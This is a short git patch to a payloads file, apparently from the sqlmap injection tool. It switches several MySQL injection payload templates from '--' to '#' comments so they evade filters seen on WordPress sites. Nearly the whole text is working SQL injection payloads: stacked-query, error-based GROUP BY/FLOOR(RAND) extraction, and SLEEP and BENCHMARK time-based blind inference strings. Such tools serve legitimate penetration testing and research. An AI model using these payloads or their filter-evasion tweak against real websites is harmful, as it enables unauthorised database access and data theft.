From df4e3be19196f35a5921be9abf95d89564ba69f2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 23 Nov 2011 22:57:02 +0000 Subject: [PATCH] using MySQL comments in explicit MySQL payloads where not comments stated in title (as we already use in MySQL UNION payloads; in lots of cases minus character is either filtered or "exploded" - seen in lots of WP vulnerabilites; also, it was a false claim by myself previously that # is no longer a valid MySQL comment syntax in never versions) --- xml/payloads.xml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/xml/payloads.xml b/xml/payloads.xml index 289c59003..3db241a5f 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1039,7 +1039,7 @@ Formats: ; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]); ; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]); - -- + # ; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]); @@ -1402,7 +1402,7 @@ Formats: OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) - -- + # [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1834,7 +1834,7 @@ Formats: ; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]); ; SELECT SLEEP([SLEEPTIME]); - -- + # @@ -1855,7 +1855,7 @@ Formats: ; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]); ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')); - -- + # @@ -2106,7 +2106,7 @@ Formats: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) AND SLEEP([SLEEPTIME]) - -- + # @@ -2146,7 +2146,7 @@ Formats: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) - -- + #